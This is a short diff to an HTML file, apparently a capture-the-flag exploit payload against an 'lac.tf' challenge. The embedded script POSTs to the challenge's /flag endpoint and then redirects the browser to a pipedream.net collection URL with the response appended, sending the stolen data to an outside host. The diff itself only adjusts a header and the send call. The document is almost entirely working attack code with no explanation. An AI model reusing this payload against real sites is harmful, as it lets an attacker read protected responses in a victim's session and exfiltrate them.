--- a/csp.html
+++ b/csp.html
@@ -2,12 +2,11 @@
 let xhr = new XMLHttpRequest();
 xhr.open("POST", "https://california-state-police.lac.tf/flag");
 xhr.setRequestHeader("Accept", "*/*");
-xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
 
 xhr.onreadystatechange = function () {
   if (xhr.readyState === 4) {
     window.location="https://envjs5kxlmfl33f.m.pipedream.net?c="+xhr.responseText
   }};
 
-xhr.send("");
+xhr.send(null);
 </script>
